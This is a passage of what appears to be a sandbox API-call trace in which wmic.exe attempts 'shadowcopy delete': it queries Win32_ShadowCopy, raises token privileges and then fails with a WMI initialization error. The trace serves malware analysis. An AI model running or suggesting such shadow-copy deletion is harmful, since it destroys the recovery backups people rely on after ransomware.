wReserved3=0x0, varVal1=0xc40a10, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.934] IUnknown:QueryInterface (in: This=0xc40a10, riid=0x13769ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8ff5f8 | out: ppvObject=0x8ff5f8*=0xc40a10) returned 0x0 [0119.934] GetCurrentThreadId () returned 0x8d4 [0119.934] ??0CHString@@QAE@XZ () returned 0x8ff578 [0119.934] IWbemClassObject:Get (in: This=0xc40a10, wszName="Namespace", lFlags=0, pVal=0x8ff55c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.934] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0119.934] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0119.935] IWbemClassObject:Get (in: This=0xc40a10, wszName="Locale", lFlags=0, pVal=0x8ff55c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc373d4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.935] lstrlenW (lpString="ms_409") returned 6 [0119.935] lstrlenW (lpString="ms_409") returned 6 [0119.935] IWbemClassObject:Get (in: This=0xc40a10, wszName="User", lFlags=0, pVal=0x8ff55c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc373d4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.935] IWbemClassObject:Get (in: This=0xc40a10, wszName="Password", lFlags=0, pVal=0x8ff55c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.935] IWbemClassObject:Get (in: This=0xc40a10, wszName="Server", lFlags=0, pVal=0x8ff55c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.935] lstrlenW (lpString=".") returned 1 [0119.936] lstrlenW (lpString=".") returned 1 [0119.936] IWbemClassObject:Get (in: This=0xc40a10, wszName="Authority", lFlags=0, pVal=0x8ff55c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc373d4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff55c*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.936] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.936] IUnknown:Release (This=0xc40a10) returned 0x1 [0119.936] GetCurrentThreadId () returned 0x8d4 [0119.936] ??0CHString@@QAE@XZ () returned 0x8ff568 [0119.936] IWbemClassObject:Get (in: This=0xc4e928, wszName="__RELPATH", lFlags=0, pVal=0x8ff550*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff550*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.936] GetCurrentThreadId () returned 0x8d4 [0119.936] ??0CHString@@QAE@XZ () returned 0x8ff4e4 [0119.936] ??0CHString@@QAE@PBG@Z () returned 0x8ff4e0 [0119.936] ??0CHString@@QAE@ABV0@@Z () returned 0x8ff460 [0119.936] ?Empty@CHString@@QAEXXZ () returned 0x73be6430 [0119.936] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb59988 [0119.936] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0119.936] ?Left@CHString@@QBE?AV1@H@Z () returned 0x8ff458 [0119.936] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x8ff45c [0119.936] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x8ff4e0 [0119.937] ??1CHString@@QAE@XZ () returned 0x1 [0119.937] ??1CHString@@QAE@XZ () returned 0x1 [0119.937] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x8ff454 [0119.937] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x8ff460 [0119.937] ??1CHString@@QAE@XZ () returned 0x1 [0119.937] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb599f0 [0119.937] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0119.937] ?Left@CHString@@QBE?AV1@H@Z () returned 0x8ff458 [0119.937] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x8ff45c [0119.937] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x8ff4e0 [0119.937] ??1CHString@@QAE@XZ () returned 0x1 [0119.937] ??1CHString@@QAE@XZ () returned 0x1 [0119.937] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x8ff454 [0119.937] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x8ff460 [0119.937] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.937] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x73be6424 [0119.937] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.937] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0119.937] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0119.937] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0119.937] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0119.937] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0119.937] SysStringLen (param_1="\"") returned 0x1 [0119.938] IWbemServices:GetObject (in: This=0xc30cf0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x8ff4f0*=0x0, ppCallResult=0x0 | out: ppObject=0x8ff4f0*=0xc40d68, ppCallResult=0x0) returned 0x0 [0119.992] IWbemClassObject:Get (in: This=0xc40d68, wszName="Text", lFlags=0, pVal=0x8ff4bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff4bc*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc3f8f0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xc37c40, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.992] SafeArrayGetLBound (in: psa=0xc3f8f0, nDim=0x1, plLbound=0x8ff4cc | out: plLbound=0x8ff4cc) returned 0x0 [0119.992] SafeArrayGetUBound (in: psa=0xc3f8f0, nDim=0x1, plUbound=0x8ff4d0 | out: plUbound=0x8ff4d0) returned 0x0 [0119.992] SafeArrayGetElement (in: psa=0xc3f8f0, rgIndices=0x8ff4e8, pv=0x8ff4d4 | out: pv=0x8ff4d4) returned 0x0 [0119.992] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0119.992] IUnknown:Release (This=0xc40d68) returned 0x0 [0119.992] ??1CHString@@QAE@XZ () returned 0x1 [0119.992] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.992] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.992] lstrlenW (lpString="Shadow copy management.") returned 23 [0119.992] lstrlenW (lpString="Shadow copy management.") returned 23 [0119.993] IUnknown:Release (This=0xc4e928) returned 0x0 [0119.993] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.993] lstrlenW (lpString="PATH") returned 4 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0119.993] lstrlenW (lpString="WHERE") returned 5 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0119.993] lstrlenW (lpString="(") returned 1 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0119.993] lstrlenW (lpString="/") returned 1 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0119.993] lstrlenW (lpString="-") returned 1 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0119.993] lstrlenW (lpString="GET") returned 3 [0119.993] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0119.994] lstrlenW (lpString="LIST") returned 4 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0119.994] lstrlenW (lpString="SET") returned 3 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0119.994] lstrlenW (lpString="CREATE") returned 6 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0119.994] lstrlenW (lpString="CALL") returned 4 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0119.994] lstrlenW (lpString="ASSOC") returned 5 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.994] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0119.994] lstrlenW (lpString="DELETE") returned 6 [0119.994] lstrlenW (lpString="delete") returned 6 [0119.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0119.996] lstrlenW (lpString="/") returned 1 [0119.996] lstrlenW (lpString="delete") returned 6 [0119.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0119.996] lstrlenW (lpString="-") returned 1 [0119.996] lstrlenW (lpString="delete") returned 6 [0119.996] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0119.996] lstrlenW (lpString="delete") returned 6 [0119.996] lstrlenW (lpString="delete") returned 6 [0119.996] lstrlenW (lpString="GET") returned 3 [0119.996] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0119.997] lstrlenW (lpString="LIST") returned 4 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0119.997] lstrlenW (lpString="SET") returned 3 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0119.997] lstrlenW (lpString="CREATE") returned 6 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0119.997] lstrlenW (lpString="CALL") returned 4 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0119.997] lstrlenW (lpString="ASSOC") returned 5 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0119.997] lstrlenW (lpString="DELETE") returned 6 [0119.997] lstrlenW (lpString="delete") returned 6 [0119.997] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0119.997] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0119.997] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0119.997] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x13acb489 | out: _String="Select", _Context=0x13acb489) returned="Select" [0119.997] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb489 | out: _String=0x0, _Context=0x13acb489) returned="*" [0119.998] lstrlenW (lpString="FROM") returned 4 [0119.998] lstrlenW (lpString="*") returned 1 [0119.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0119.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb489 | out: _String=0x0, _Context=0x13acb489) returned="from" [0119.998] lstrlenW (lpString="FROM") returned 4 [0119.998] lstrlenW (lpString="from") returned 4 [0119.998] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0119.998] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb489 | out: _String=0x0, _Context=0x13acb489) returned="Win32_ShadowCopy" [0119.999] lstrlenW (lpString="SET") returned 3 [0119.999] lstrlenW (lpString="delete") returned 6 [0119.999] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0119.999] lstrlenW (lpString="CREATE") returned 6 [0119.999] lstrlenW (lpString="delete") returned 6 [0119.999] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0119.999] lstrlenW (lpString="GET") returned 3 [0119.999] lstrlenW (lpString="delete") returned 6 [0119.999] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0119.999] lstrlenW (lpString="LIST") returned 4 [0119.999] lstrlenW (lpString="delete") returned 6 [0119.999] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0119.999] lstrlenW (lpString="ASSOC") returned 5 [0119.999] lstrlenW (lpString="delete") returned 6 [0119.999] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0119.999] WbemLocator:IUnknown:AddRef (This=0xc071c0) returned 0x3 [0120.000] lstrlenW (lpString="") returned 0 [0120.000] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.000] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0120.000] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.000] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.000] GetCurrentThreadId () returned 0x8d4 [0120.000] GetCurrentProcess () returned 0xffffffff [0120.000] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x8ff674 | out: TokenHandle=0x8ff674*=0x274) returned 1 [0120.000] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8ff670 | out: TokenInformation=0x0, ReturnLength=0x8ff670) returned 0 [0120.000] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x3, TokenInformation=0xb599c0, TokenInformationLength=0x118, ReturnLength=0x8ff670 | out: TokenInformation=0xb599c0, ReturnLength=0x8ff670) returned 1 [0120.000] AdjustTokenPrivileges (in: TokenHandle=0x274, DisableAllPrivileges=0, NewState=0xb599c0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.000] CloseHandle (hObject=0x274) returned 1 [0120.000] lstrlenW (lpString="GET") returned 3 [0120.000] lstrlenW (lpString="delete") returned 6 [0120.000] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0120.000] lstrlenW (lpString="LIST") returned 4 [0120.000] lstrlenW (lpString="delete") returned 6 [0120.000] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0120.000] lstrlenW (lpString="SET") returned 3 [0120.000] lstrlenW (lpString="delete") returned 6 [0120.000] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0120.001] lstrlenW (lpString="CALL") returned 4 [0120.001] lstrlenW (lpString="delete") returned 6 [0120.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0120.001] lstrlenW (lpString="ASSOC") returned 5 [0120.001] lstrlenW (lpString="delete") returned 6 [0120.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0120.001] lstrlenW (lpString="CREATE") returned 6 [0120.001] lstrlenW (lpString="delete") returned 6 [0120.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0120.001] lstrlenW (lpString="DELETE") returned 6 [0120.001] lstrlenW (lpString="delete") returned 6 [0120.001] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0120.001] lstrlenA (lpString="") returned 0 [0120.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1372b44, cbMultiByte=-1, lpWideCharStr=0xb53c20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.001] lstrlenA (lpString="") returned 0 [0120.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1372b44, cbMultiByte=-1, lpWideCharStr=0xb53c20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.001] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.001] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.001] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x13acb4d1 | out: _String="Select", _Context=0x13acb4d1) returned="Select" [0120.002] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb4d1 | out: _String=0x0, _Context=0x13acb4d1) returned="*" [0120.002] lstrlenW (lpString="FROM") returned 4 [0120.002] lstrlenW (lpString="*") returned 1 [0120.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.002] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb4d1 | out: _String=0x0, _Context=0x13acb4d1) returned="from" [0120.002] lstrlenW (lpString="FROM") returned 4 [0120.002] lstrlenW (lpString="from") returned 4 [0120.002] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.002] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x13acb4d1 | out: _String=0x0, _Context=0x13acb4d1) returned="Win32_ShadowCopy" [0120.002] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0120.002] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0120.003] ??0CHString@@QAE@XZ () returned 0x8ff614 [0120.003] GetCurrentThreadId () returned 0x8d4 [0120.003] SysStringLen (param_1="\\\\") returned 0x2 [0120.003] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0120.003] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0120.003] SysStringLen (param_1="\\") returned 0x1 [0120.003] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0120.003] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0120.004] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc071c0, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x13b9564 | out: ppNamespace=0x13b9564*=0xc30e30) returned 0x0 [0120.033] CoSetProxyBlanket (pProxy=0xc30e30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.033] ??1CHString@@QAE@XZ () returned 0x73be6430 [0120.033] ??0CHString@@QAE@XZ () returned 0x8ff604 [0120.033] GetCurrentThreadId () returned 0x8d4 [0120.033] lstrlenA (lpString="") returned 0 [0120.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1372b44, cbMultiByte=-1, lpWideCharStr=0xb53c20, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.034] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0120.034] SysStringLen (param_1="") returned 0x0 [0120.034] IWbemServices:ExecQuery (in: This=0xc30e30, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x8ff5fc | out: ppEnum=0x8ff5fc*=0x0) returned 0x80041014 [0121.794] _CxxThrowException () [0121.794] ??1CHString@@QAE@XZ () returned 0x73be6430 [0121.794] GetCurrentThreadId () returned 0x8d4 [0121.794] ??0CHString@@QAE@PBG@Z () returned 0x8ff6a4 [0121.794] ??YCHString@@QAEABV0@PBG@Z () returned 0x8ff6a4 [0121.794] ??0CHString@@QAE@XZ () returned 0x8ff570 [0121.794] SysStringLen (param_1="") returned 0x0 [0121.794] CoCreateInstance (in: rclsid=0x13769bc*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x13769cc*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x13b957c | out: ppv=0x13b957c*=0xc37d80) returned 0x0 [0121.797] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0xc37d80, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x8ff574 | out: MessageText=0x8ff574*="Initialization failure\r\n") returned 0x0 [0121.867] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0xc37d80, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x8ff578 | out: MessageText=0x8ff578*="WMI") returned 0x0 [0121.867] lstrlenW (lpString="WMI") returned 3 [0121.867] lstrlenW (lpString="Wbem") returned 4 [0121.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0121.867] lstrlenW (lpString="WMI") returned 3 [0121.867] lstrlenW (lpString="WMI") returned 3 [0121.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0121.867] WbemStatusCodeText:IUnknown:Release (This=0xc37d80) returned 0x0 [0121.867] ??1CHString@@QAE@XZ () returned 0x73be6430 [0121.867] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x8fedd0, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0121.867] FormatMessageW (in: dwFlags=0x2500, lpSource=0x8fedd0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x8fedb8, nSize=0x0, Arguments=0x8fedbc | out: lpBuffer="阈Á䬔Ã") returned 0x2e [0121.867] LocalFree (hMem=0xc19608) returned 0x0 [0121.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0121.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0xb59a38, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0121.868] __iob_func () returned 0x77ac1208 [0121.868] fprintf (in: _File=0x77ac1248, _Format="%s" | out: _File=0x77ac1248) returned 46 [0121.869] __iob_func () returned 0x77ac1208 [0121.870] fflush (in: _File=0x77ac1248 | out: _File=0x77ac1248) returned 0 [0121.870] ??1CHString@@QAE@XZ () returned 0x1 [0121.870] ??0CHString@@QAE@PBG@Z () returned 0x8ff6ac [0121.870] ??YCHString@@QAEABV0@PBG@Z () returned 0x8ff6ac [0121.870] GetCurrentThreadId () returned 0x8d4 [0121.870] ??1CHString@@QAE@XZ () returned 0x1 [0121.870] IUnknown:Release (This=0xc30e30) returned 0x0 [0121.870] ?Empty@CHString@@QAEXXZ () returned 0x73be6424 [0121.870] _kbhit () returned 0x0 [0121.871] ?Empty@CHString@@QAEXXZ () returned 0x73be6424 [0121.872] WbemLocator:IUnknown:Release (This=0xc071c0) returned 0x2 [0121.872] IUnknown:Release 